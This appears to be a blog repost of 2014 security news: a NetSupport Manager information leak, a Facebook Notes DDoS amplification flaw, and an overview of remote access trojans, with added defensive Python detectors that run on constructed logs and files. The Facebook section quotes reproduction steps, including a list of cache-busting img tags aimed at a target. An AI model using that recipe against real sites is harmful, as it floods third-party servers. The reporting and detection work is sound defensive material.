<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NetSupport-vulnerability.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="NetSupport vulnerability" class="aligncenter wp-image-24351" height="251" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NetSupport-vulnerability-1024x506.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="A flaw in old versions of NetSupport Manager exposes company data" width="508" /></a></div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The data captured by Kirkpatrick contains the NetSupport version info, hostname, user and the encrypted <a href="http://securityaffairs.co/wordpress/21472/digital-id/weak-passwords-2013.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Weak passwords, in 2013 it is still a frequent error">password</a> of the “Configurator Password.”</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
To sum up, the steps performed by the researcher’s Nmap script are:</div>
<ul style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Sends a NetSupport Inventory query in raw packets</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Checks if the response includes the word “License”</em><ul style="list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>If so, it has successfully connected to the client without the need for authentication</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>If not, then most probably it requires authentication</em></li>
</ul>
</li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Displays the response including user information such as hostname, user, version info, password of the “Configurator Password,” etc.</em></li>
</ul>
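<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The point Kirkpatrick makes about the clients being “unaware” of the testing is the defender’s problem in a nutshell: nothing on the endpoint records an unauthenticated inventory query, so the only place to see a sweep of this kind is in network telemetry. The following is an added example, not part of the article or of Kirkpatrick’s Nmap script. It reads a constructed tab-separated connection log and reports every host that queries the NetSupport client port without being one of the known manager consoles, and whether that host touched enough distinct clients inside a short window to look like a sweep. It assumes the clients listen on TCP 5405 (NetSupport’s documented default; verify it against your own deployment), and the addresses, the console allowlist and the log format are assumptions.</div>

```python
"""Spot unauthorized NetSupport inventory probes and sweeps in connection logs.

Added example, not from the article or Kirkpatrick's script. Assumptions:
the remote-control client listens on TCP 5405 (NetSupport's documented
default; check your deployment), a constructed tab-separated connection
log, and an allowlist of the manager consoles entitled to query clients.
"""
import csv
import io
from collections import defaultdict

NETSUPPORT_PORT = 5405            # assumed default client port
MANAGER_CONSOLES = {"10.1.0.5"}   # assumed: the only hosts allowed to query clients

# Constructed connection log (epoch seconds, originator, responder, port, proto).
SAMPLE_CONN_LOG = """\
ts\torig_h\tresp_h\tresp_p\tproto
1398700000.10\t10.1.0.5\t10.1.2.15\t5405\ttcp
1398700001.40\t10.1.0.5\t10.1.2.16\t5405\ttcp
1398700100.00\t10.1.7.99\t10.1.2.10\t5405\ttcp
1398700100.20\t10.1.7.99\t10.1.2.11\t5405\ttcp
1398700100.40\t10.1.7.99\t10.1.2.12\t5405\ttcp
1398700100.60\t10.1.7.99\t10.1.2.13\t5405\ttcp
1398700100.80\t10.1.7.99\t10.1.2.14\t5405\ttcp
1398700101.00\t10.1.7.99\t10.1.2.15\t5405\ttcp
1398700300.00\t10.1.7.99\t10.1.2.50\t443\ttcp
1398700400.00\t10.1.3.3\t10.1.2.15\t5405\ttcp
"""


def parse_conn_log(text):
    """Yield one dict per connection record."""
    for row in csv.DictReader(io.StringIO(text), delimiter="\t"):
        yield {"ts": float(row["ts"]), "src": row["orig_h"],
               "dst": row["resp_h"], "dport": int(row["resp_p"])}


def detect(text, consoles=MANAGER_CONSOLES, port=NETSUPPORT_PORT,
           window=60.0, sweep_threshold=5):
    """One finding per non-console host that connected to the client port.

    `sweep` is set when the host reached `sweep_threshold` or more distinct
    clients within any `window`-second span, the signature of a scripted scan
    rather than a single stray connection.
    """
    by_src = defaultdict(list)
    for ev in parse_conn_log(text):
        if ev["dport"] == port and ev["src"] not in consoles:
            by_src[ev["src"]].append(ev)

    findings = []
    for src, events in sorted(by_src.items()):
        events.sort(key=lambda e: e["ts"])
        max_in_window, start = 0, 0
        for end in range(len(events)):             # sliding window over time
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            distinct = {e["dst"] for e in events[start:end + 1]}
            max_in_window = max(max_in_window, len(distinct))
        findings.append({
            "src": src,
            "targets": len({e["dst"] for e in events}),
            "sweep": max_in_window >= sweep_threshold,
        })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_CONN_LOG):
        print(finding)
```

<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
On the sample the console’s own queries are ignored, a single connection from an unlisted workstation is reported without the sweep flag, and a host that walks six clients in one second is reported as a sweep. Either finding is worth a look; the single connection may be a misplaced console, the sweep is exactly the behaviour the article describes. Setting a client password, as the mitigation below says, is still what stops the information leaking; this detection only tells you someone is asking.</div>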
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NetSupport-vulnerability-data-retrieved.png" style="color: #993333; font-weight: bold; text-decoration: none;"><img alt="NetSupport vulnerability data retrieved" class="aligncenter wp-image-24354" height="324" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NetSupport-vulnerability-data-retrieved.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="A flaw in old versions of NetSupport Manager exposes company data" width="477" /></a></div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
To mitigate the vulnerability in older versions it is necessary to change the default setting and enforce a password on the clients.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #444444; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“In this case installing the default NetSupport client settings on a PC, where no Client password is set, can allow information to be freely returned, which can assist an attacker.”</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
As explained by Kirkpatrick, the flaw in the NetSupport software has been fixed in “later revisions”; version 12, which is currently on the market, is secure.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/24348/hacking/flaw-old-versions-netsupport.html" target="_blank">http://securityaffairs.co/wordpress/24348/hacking/flaw-old-versions-netsupport.html</a></div>
[securityaffairs] How to abuse Facebook feature to conduct powerful DDoS attack (2014-04-28)<h2 align="justify" class="post-title entry-title url" style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
A researcher discovered a flaw in the section “notes” of the social network Facebook that could be exploited by anyone to conduct a powerful DDoS attack.<a name='more'></a></h2>
<div class="post-body entry-content" style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px;">
<div class="articlebodyonly" id="articlebodyonly" style="color: black;">
<div id="aim11106704030046763357">
<div dir="ltr">
<div>
The security researcher Chaman Thapa, also known as chr13, discovered a vulnerability in the section ‘Notes’ of the popular <a href="http://securityaffairs.co/wordpress/8371/cyber-crime/social-networks-are-you-exposing-yourself-physical-threats.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Social Networks Part 3 – Are you exposing yourself unnecessarily to physical threats?">social network</a> Facebook that could be exploited by anyone to launch a <a href="http://securityaffairs.co/wordpress/22159/cyber-crime/400gbps-distributed-denial-of-service.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Largest Ever 400Gbps Distributed Denial of Service NTP Amplification attack hit Cloudfare">distributed denial-of-service</a> (DDoS) attack of more than 800 Mbps of bandwidth against any website.</div>
<div>
</div>
<div>
Chaman Thapa demonstrated that simply reading a ‘Note’, which anyone can create on the Facebook platform, automatically generates traffic that an attacker can direct against a target.</div>
<div>
The researcher published a blog post describing the vulnerability: he exploited the possibility of including &lt;img&gt; tags inside a note, which allows the creation of notes that embed images from any source.</div>
<div>
</div>
<div>
The attack scenario is very simple: Facebook downloads an external image from the original source only the first time and, to improve performance, stores it in its cache for subsequent uses. If the image URL has dynamic parameters, Facebook is not able to store the image in the cache, and in practice it downloads all the images included in a note every time anybody views the note.</div>
</div>
</div>
<div id="aim21106704030046763357">
<blockquote style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<em>“Facebook Notes allows users to include &lt;img&gt; tags. 
Whenever a &lt;img&gt; tag is used, Facebook crawls the image from the external server and caches it. 
Facebook will only cache the image once; however, using random GET parameters the cache can be bypassed and the feature can be abused to cause a huge HTTP GET flood.”</em></blockquote>
<div>
Let’s look at the DDoS attack scenario described by Chaman Thapa. Take a target website, “<i>target.com</i>”, that hosts a large image (e.g. 1 MB) on its server. The researcher creates a <i>Facebook Note</i> that includes this image many times over, each time with a different query parameter, plus some text.</div>
<div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
Facebook’s servers are forced to download the 1 MB file 1000 times for a single page view (it has been estimated that each note is responsible for 1000+ HTTP requests). If 100 Facebook users read the same note at the same time, Facebook’s servers will be forced to download <i>1 x 1000 x 100 = 100,000 MB, or 97.65 GB</i>, from the targeted server within a few seconds. The graph below shows the 400 Mbps of traffic generated by 127 Facebook servers in the proof of concept Thapa ran against his own web server.</div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Facebook-DDoS.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Facebook DDoS" class="aligncenter wp-image-24364" height="160" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Facebook-DDoS.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="How to abuse Facebook feature to conduct powerful DDoS attack" width="488" /></a></div>
</div>
<div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
Following is the description provided by Chaman Thapa in his post.</div>
</div>
<div>
<div class="separator">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>Steps to re-create the bug as reported to Facebook Bug Bounty on March 03, 2014. Step 1. Create a list of unique img tags, as one tag is crawled only once</em></div>
<pre class="wp-code-highlight prettyprint prettyprinted" style="background-color: #e9ebd9; color: #555555; font-size: 1em; margin-bottom: 10px; margin-top: 10px; overflow: auto; padding: 1em 10px;"><em>&lt;img src=http://targetname/file?r=1&gt;&lt;/img&gt;
&lt;img src=http://targetname/file?r=2&gt;&lt;/img&gt;
..
&lt;img src=http://targetname/file?r=1000&gt;&lt;/img&gt;</em></pre>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>Step 2. Use m.facebook.com to create the notes. It silently truncates the notes to a fixed length.</em></div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>Step 3. Create several notes from the same user or different users. Each note is now responsible for 1000+ HTTP requests.</em></div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>Step 4. View all the notes at the same time. The target server is observed to have a massive HTTP GET flood. Thousands of GET requests are sent to a single server in a couple of seconds. The total number of Facebook servers accessing in parallel is 100+.</em></div>
</div>
</div>
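<div>From the defender’s side, the signature of this abuse on the origin server is a burst of GET requests for one static file that differ only in their query string, arriving from many crawler addresses at once. The Python below is an added example, not code from Thapa’s write-up: it parses combined-format access logs and flags that pattern, totals the bytes the origin served in the window, and reproduces the article’s 1 x 1000 x 100 egress estimate. The log lines, the client addresses and the Facebook crawler User-Agent string are constructed or assumed, not taken from the article.</div>

```python
"""Detect a cache-busting GET flood in web-server access logs: many requests for
one path whose only difference is the query string, as in the Notes scenario.
Added example; the log lines below are constructed, not real traffic."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# User-Agent Facebook's crawler is documented to send; treated as an assumption here.
CRAWLER_UA = "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    size = m.group("bytes")
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": path,
        "query": query,
        "bytes": 0 if size == "-" else int(size),
        "ua": m.group("ua"),
    }


def find_cache_busting_floods(lines, window_s=10, min_requests=50, min_unique_ratio=0.9):
    """Per path, find the densest window_s-second window of GET requests. Flag the
    path when that window holds >= min_requests and nearly every request carried a
    distinct query string (the cache-busting signature). bytes_served is the
    amplified egress the origin actually paid for in that window."""
    by_path = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "GET":
            by_path[rec["path"]].append(rec)
    findings = []
    for path, recs in by_path.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = (0, 0), 0
        for end in range(len(recs)):  # sliding window over sorted timestamps
            while recs[end]["ts"] - recs[start]["ts"] > timedelta(seconds=window_s):
                start += 1
            if end - start > best[1] - best[0]:
                best = (start, end)
        win = recs[best[0]:best[1] + 1]
        uniq = len({r["query"] for r in win})
        if len(win) >= min_requests and uniq / len(win) >= min_unique_ratio:
            findings.append({
                "path": path,
                "requests": len(win),
                "unique_queries": uniq,
                "client_ips": len({r["ip"] for r in win}),
                "bytes_served": sum(r["bytes"] for r in win),
                "user_agents": sorted({r["ua"] for r in win}),
            })
    return findings


def estimated_egress_mb(file_mb, tags_per_note, concurrent_viewers):
    """The article's amplification estimate: the file is fetched once per tag per viewer."""
    return file_mb * tags_per_note * concurrent_viewers


def _log_line(ip, ts, target, nbytes, ua):
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "GET {target} HTTP/1.1" 200 {nbytes} "-" "{ua}"'


# Constructed sample: 60 fetches of one 1 MB image, each with a fresh ?r= value,
# from 25 crawler addresses (RFC 5737 TEST-NET-3) within six seconds.
_T0 = datetime(2014, 4, 20, 10, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = [
    _log_line(f"203.0.113.{i % 25 + 1}", _T0 + timedelta(seconds=i // 10),
              f"/images/large.jpg?r={i}", 1048576, CRAWLER_UA)
    for i in range(60)
]
# Ordinary browsing of the same site: few requests, no query-string churn.
BENIGN_LOG = [
    _log_line("192.0.2.10", _T0 + timedelta(seconds=i * 7), "/index.html", 5120,
              "Mozilla/5.0 (constructed)")
    for i in range(5)
]

if __name__ == "__main__":
    for finding in find_cache_busting_floods(SAMPLE_LOG + BENIGN_LOG):
        print(finding)
    print("estimated egress, MB:", estimated_egress_mb(1, 1000, 100))
```

The thresholds are tunable; the useful mitigation once the pattern is confirmed is to key the cache and any rate limit on the path alone for static assets, so that query-string variation no longer buys a fresh fetch.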
<div>
The researcher explained that the amplification factor of the DDoS attack depends on the size of the file being fetched; it could be even higher if the note pointed at a PDF or a video instead of an image.</div>
<blockquote style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<em>“A scenario of traffic amplification: when the image is replaced by a pdf or video of larger size, Facebook would crawl a huge file but the user gets nothing.” “Each Note supports 1000+ links and Facebook blocks a user after creating around 100 Notes in a short span. Since there is no captcha for note creation, all of this can be automated and an attacker could easily prepare hundreds of notes using multiple users until the time of attack when all of them are viewed at once.” noted Chaman Thapa.</em></blockquote>
<div>
There is a concrete risk that a bad actor could script the creation of hundreds of such notes from multiple user accounts at the same time, resulting in a powerful DDoS attack.</div>
<div>
</div>
<div>
The alarming news is that the flaw is still unpatched and Facebook has no plans to fix it.</div>
<blockquote style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
“<i>In the end, the conclusion is that there’s no real way for us to fix this that would stop attacks against small consumer grade sites without also significantly degrading the overall functionality,</i>” replied Facebook to the researcher.</blockquote>
<a href="http://securityaffairs.co/wordpress/24359/cyber-crime/use-facebook-ddos-attack.html" target="_blank">http://securityaffairs.co/wordpress/24359/cyber-crime/use-facebook-ddos-attack.html</a> </div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-19635950794542134232014-04-28T21:34:00.001-07:002014-04-28T21:34:29.982-07:00[infosecinstitute] Remote Access Tool<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
A Remote Access Tool is a piece of software used to remotely access or control a computer. Such tools are used legitimately by system administrators to access client computers. When used for malicious purposes, a remote access tool is known as a Remote Access Trojan (RAT): it lets a malicious user control the system without the victim’s knowledge. Most popular RATs are capable of keylogging, screen and camera capture, file access, code execution, registry management, password sniffing, etc.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
RAT is also used as a synonym for backdoor: it consists of a client and a server program. When the server (or stub) program is installed on a system without the knowledge of that system’s owner, it is called a Remote Access Trojan.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Remote Administration Trojans (RATs) are malicious programs that infect the victim’s machine to gain administrative access. They are often bundled into pirated software through patches, cracked games or e-mail attachments. After infection, the RAT may perform unauthorized operations while hiding its presence on the infected system. An attacker can then remotely control the system and collect keystroke logs, webcam feeds, audio recordings, screen captures, etc.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
RATs normally obscure their presence by changing their file name, size, and often their behavior or encryption methods, so as to evade AV, firewalls, IDS, IPS and other security defenses. Beyond the remote access capabilities themselves, some RATs also act as a backdoor to the system, installing further viruses, worms, spyware, adware, etc. The infected machines can thus also be used as bots or zombies to carry out further attacks against other machines, including DDoS.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>RAT Detection</strong></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
RATs can be avoided by verifying each piece of software before installation against authorized program signatures. These signatures may be available from the product vendors; however, applying this procedure consistently at an organizational level can be difficult. In addition, RATs use varying levels of obfuscation to hide their characteristics from detection systems. A RAT is normally injected into legitimate software, or even distributed as a patch or other update, which makes it hard to catch.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Host- and network-based detection methods can be correlated for reliable detection of RATs. In host-based detection, the unique characteristics of a RAT (file name, size, checksum and other distinguishing features) are stored in a database. New programs are scanned against this RAT database, and a program whose patterns match is recognized as a RAT. Startup files, registry keys, autostart entries and configuration scripts can also be monitored, and any distinctive behavior found there can be flagged as a RAT.</div>
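<div>As an added illustration of the host-based method just described (example code, not from the InfoSec Institute article), the Python below keeps a small signature database of file name, size and SHA-256, scans a directory tree against it with graded confidence, and checks autostart command lines for the same names. The ali.exe and bo2k.exe names and the 28,200-byte size are the ones this article quotes; the third entry, the digests, the sample files and the autorun entries are constructed placeholders.</div>

```python
"""Host-based RAT triage as described above: a database of known RAT traits
(file name, size, checksum) is compared against files on disk, and autostart
entries are checked against the same names. Added example: the signature entries,
digests and sample files are constructed placeholders, not real indicators."""
import hashlib
import os
import shlex
import tempfile
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Signature:
    family: str
    name: str               # default dropped file name
    size: Optional[int]     # bytes, None if unknown
    sha256: Optional[str]   # hex digest, None if unknown


# Constructed payload standing in for a sample whose checksum is on file.
SAMPLE_PAYLOAD = b"constructed sample payload" * 128

# ali.exe / 28,200 bytes and bo2k.exe are the names the article gives;
# the third entry is a pure placeholder.
SIGNATURE_DB = [
    Signature("Bandook", "ali.exe", 28200, None),
    Signature("Back Orifice 2000", "bo2k.exe", None, None),
    Signature("PLACEHOLDER_FAMILY", "svchost32.exe", len(SAMPLE_PAYLOAD),
              hashlib.sha256(SAMPLE_PAYLOAD).hexdigest()),
]


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(path: str, db=SIGNATURE_DB) -> Optional[Tuple[str, str]]:
    """Checksum hit = 'high' confidence; name plus size = 'medium';
    bare name match = 'low', since RATs reuse and change file names freely."""
    name = os.path.basename(path).lower()
    size = os.path.getsize(path)
    digest = sha256_file(path)
    best = None
    for sig in db:
        if sig.sha256 and sig.sha256 == digest:
            return (sig.family, "high")
        if sig.name.lower() == name:
            level = "medium" if sig.size == size else "low"
            if best is None or level == "medium":
                best = (sig.family, level)
    return best


def scan_tree(root: str, db=SIGNATURE_DB) -> List[dict]:
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            hit = classify(p, db)
            if hit:
                findings.append({"path": p, "family": hit[0], "confidence": hit[1]})
    return sorted(findings, key=lambda f: f["path"])


def check_autoruns(entries: List[Tuple[str, str]], db=SIGNATURE_DB) -> List[Tuple[str, str]]:
    """entries are (value name, command line) pairs read from an autostart location
    such as a Run key; flag those whose executable basename is in the database."""
    names = {s.name.lower(): s.family for s in db}
    flagged = []
    for entry, cmd in entries:
        parts = shlex.split(cmd, posix=False)  # keep backslashes in Windows paths
        if not parts:
            continue
        base = parts[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
        if base in names:
            flagged.append((entry, names[base]))
    return flagged


def build_sample_tree() -> str:
    """Constructed tree: one name+size hit, one checksum hit, one benign file."""
    root = tempfile.mkdtemp(prefix="rat_triage_")
    sysdir = os.path.join(root, "System32")
    os.makedirs(sysdir)
    with open(os.path.join(sysdir, "ali.exe"), "wb") as f:
        f.write(b"\0" * 28200)
    with open(os.path.join(sysdir, "svchost32.exe"), "wb") as f:
        f.write(SAMPLE_PAYLOAD)
    with open(os.path.join(root, "notes.txt"), "w") as f:
        f.write("benign text")
    return root


# Constructed autorun entries in Run-key style: one points at a known name.
SAMPLE_AUTORUNS = [
    ("Updater", r'"C:\Windows\System32\ali.exe" -s'),
    ("OneDrive", r'C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background'),
]
```

Running `scan_tree(build_sample_tree())` and `check_autoruns(SAMPLE_AUTORUNS)` shows the graded output; a name-only match is deliberately reported as low confidence because, as the article notes, RATs change names and sizes to evade exactly this kind of lookup.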
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In network-based detection, the network communication protocols are monitored to check for deviations from normal network usage. Ports can be watched for exceptional behavior, and the protocol headers of packets exchanged between systems can be analyzed. Network traffic can then be analyzed so that RAT behavior patterns are distinguished from legitimate traffic.</div>
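<div>The network-based method can be made concrete with two checks over connection records: destination ports known to carry RAT control traffic, and connection timing that is too regular to be a person at a keyboard. The Python below is an added example (not from the article); its port watchlist holds only port 1177, which this article cites for njRAT, and the connection records are constructed.</div>

```python
"""Network-side RAT triage over connection records, following the article's two
cues: traffic to ports known for RAT control channels, and connection patterns
that deviate from human usage (machine-regular beaconing to one endpoint).
Added example; the watchlist holds only the njRAT port the article cites, and
the connection records are constructed."""
from collections import defaultdict
from statistics import mean, pstdev

WATCHLIST_PORTS = {1177: "njRAT control port (from the article)"}


def find_watchlist_ports(conns):
    """Connections whose destination port is on the watchlist."""
    return [dict(c, reason=WATCHLIST_PORTS[c["dport"]])
            for c in conns if c["dport"] in WATCHLIST_PORTS]


def find_beacons(conns, min_conns=6, max_cv=0.15):
    """Group outbound connections by (src, dst, dport) and look at the gaps between
    successive connections. A coefficient of variation (stdev / mean) at or below
    max_cv means the gaps are nearly constant: a timer, not a person."""
    groups = defaultdict(list)
    for c in conns:
        groups[(c["src"], c["dst"], c["dport"])].append(c["ts"])
    beacons = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons.append({"src": src, "dst": dst, "dport": dport,
                            "connections": len(times),
                            "interval_s": round(avg, 1), "cv": round(cv, 3)})
    return beacons


def triage(conns):
    return {"watchlist": find_watchlist_ports(conns), "beacons": find_beacons(conns)}


def _series(src, dst, dport, start, gaps):
    """Build connection records from a start time and a list of inter-arrival gaps."""
    out, t = [{"ts": start, "src": src, "dst": dst, "dport": dport}], start
    for g in gaps:
        t += g
        out.append({"ts": t, "src": src, "dst": dst, "dport": dport})
    return out


# Constructed records (epoch seconds; RFC 5737 documentation addresses): an
# implant checking in every ~60 s on the njRAT port, and a user browsing an
# HTTPS site at irregular intervals.
SAMPLE_CONNS = (
    _series("10.0.0.5", "198.51.100.7", 1177, 1000,
            [59, 61, 60, 60, 59, 61, 60, 60, 59, 61, 60])
    + _series("10.0.0.8", "198.51.100.20", 443, 1000,
              [3, 40, 2, 120, 7, 15, 60])
)

if __name__ == "__main__":
    for kind, items in triage(SAMPLE_CONNS).items():
        print(kind, items)
```

The port check alone is brittle (the port is configurable in every RAT the article lists), which is why the timing check is the one worth keeping once a family changes its defaults.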
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<strong>Types of RAT</strong></div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Back Orifice</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Back Orifice 2000 (BO2K) was released in July 1999 at DefCon VII, a computer hacker convention held in Las Vegas, Nevada. It was developed by a computer hacker group named “The Cult of the Dead Cow.”</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
BO2K is a client/server application that can remotely control a computer with a fixed IP (Internet Protocol) address while hiding its presence from the victim. After installation, BO2K gathers information, runs system commands, reconfigures the machine, and redirects network traffic to unauthorized services.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This RAT has to be installed by the end user, after which it performs its functions without the user’s knowledge. The BO2K installation involves two separate components, the client and the server. The server part is an executable and normally comes under the name bo2k.exe.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
